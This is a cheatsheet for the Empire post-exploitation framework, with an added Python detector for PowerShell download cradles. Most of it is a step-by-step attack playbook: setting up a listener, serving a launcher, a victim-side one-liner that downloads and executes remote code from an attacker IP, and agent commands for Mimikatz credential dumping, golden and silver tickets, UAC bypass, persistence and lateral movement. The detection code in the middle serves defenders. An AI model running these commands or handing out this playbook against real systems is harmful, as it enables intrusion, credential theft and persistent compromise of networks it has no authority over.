Empire

Active Directory Security: Beyond the Easy Button
Empire Repo

Empire Cheatsheet

Setup Empire

docker pull empireproject/empire
docker run -i -t empireproject/empire /bin/bash
root@5e3c3ad291b1:/opt/Empire# pip install pefile
root@5e3c3ad291b1:/opt/Empire# ./empire

Creating a launcher

Searching Modules:

(Empire) > searchmodule portscan
powershell/situational_awareness/network/portscan    Does a simple port scan using regular sockets, based (pretty) loosely on nmap.

Setting up a listener and generating the launcher:

(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Host http://10.10.1.13:8001
(Empire: listeners/http) > set Port 8001
(Empire: listeners/http) > launcher powershell
# Copy the launcher output to a file (empire.ps1) and serve it with a web server
sudo python -m SimpleHTTPServer 80

Load module on Victim:

IEX(New-Object Net.WebClient).DownloadString('http://10.10.1.13/empire.ps1')
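The one-liner above is a download cradle, and PowerShell Script Block Logging (Event ID 4104) records its text verbatim. As an added detection example (not part of the cheatsheet or of Empire itself), the following Python matcher flags script blocks that combine a remote-string download with in-memory execution; the log entries it scans are constructed samples, and the regexes and severity note are my own assumptions about what a defender would want to see.

```python
import re

# Constructed sample ScriptBlockText values (not real logs): the text a defender
# would pull from Event ID 4104 entries. Only the first three are cradles.
SAMPLE_SCRIPT_BLOCKS = [
    "IEX(New-Object Net.WebClient).DownloadString('http://10.10.1.13/empire.ps1')",
    "iex (new-object net.webclient).downloadstring('http://10.10.1.13/empire.ps1')",
    "Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('http://10.10.1.13/empire.ps1'))",
    "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }",
    "(New-Object Net.WebClient).DownloadFile('https://example.invalid/tool.zip', 'C:\\tmp\\tool.zip')",
]

# A cradle needs both primitives in one block: fetch remote content as a string
# AND hand that string to an evaluator. Matching is case-insensitive because
# PowerShell is, and attackers vary the casing to dodge naive string matches.
DOWNLOAD = re.compile(r"net\.webclient\)\s*\.\s*downloadstring|invoke-webrequest|\biwr\b", re.I)
EXECUTE = re.compile(r"\biex\b|invoke-expression", re.I)
# Extra signal (assumption): a bare IP rather than a hostname in the URL.
BARE_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I)


def classify(script_block: str) -> dict:
    """Return a verdict for one script block: whether it is a cradle, and why."""
    reasons = []
    if DOWNLOAD.search(script_block):
        reasons.append("remote content fetched as a string")
    if EXECUTE.search(script_block):
        reasons.append("string passed to IEX/Invoke-Expression")
    is_cradle = len(reasons) == 2
    if is_cradle and BARE_IP_URL.search(script_block):
        reasons.append("source is a bare IP address")
    return {"cradle": is_cradle, "reasons": reasons}


def scan(blocks):
    """Return (block, reasons) for every block that looks like a download cradle."""
    hits = []
    for block in blocks:
        verdict = classify(block)
        if verdict["cradle"]:
            hits.append((block, verdict["reasons"]))
    return hits


if __name__ == "__main__":
    for block, reasons in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"ALERT: {block}\n  -> {'; '.join(reasons)}")
```

DownloadFile alone is not flagged because nothing is evaluated in memory; a real pipeline would still want that event correlated with later process creation.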

Interacting with an agent

Creating a Backup agent:

(Empire: listeners/http) > back
(Empire: listeners) > back
(Empire) > agents
(Empire: agents) > interact [agent_name]
# Spawn a second agent as a backup in case the first one dies
(Empire: UCVZ81NY) > spawn http

Run Custom Modules:

(Empire: UCVZ81NY) > usemodule powershell/privesc/powerup/allchecks
(Empire: UCVZ81NY) > usemodule powershell/privesc/gpp
(Empire: UCVZ81NY) > usemodule powershell/management/psinject    # set the target <PID> in the module options
(Empire: UCVZ81NY) > usemodule powershell/credentials/mimikatz/logonpasswords
(Empire: UCVZ81NY) > usemodule powershell/privesc/bypassuac_wscript
(Empire: UCVZ81NY) > usemodule powershell/credentials/mimikatz/golden_ticket
(Empire: UCVZ81NY) > usemodule powershell/credentials/mimikatz/silver_ticket
(Empire: UCVZ81NY) > usemodule powershell/persistence/userland/registry
(Empire: UCVZ81NY) > usemodule powershell/persistence/userland/schtasks
(Empire: UCVZ81NY) > usemodule powershell/situational_awareness/network/powerview/share_finder
(Empire: powershell/situational_awareness/network/powerview/share_finder) > set CheckShareAccess True

Run Modules:

(Empire: UCVZ81NY) > usemodule lateral_movement/invoke_portfwd

Create a new plugin

Start from the PowerShell module template:

cp Empire/lib/modules/powershell_template.py .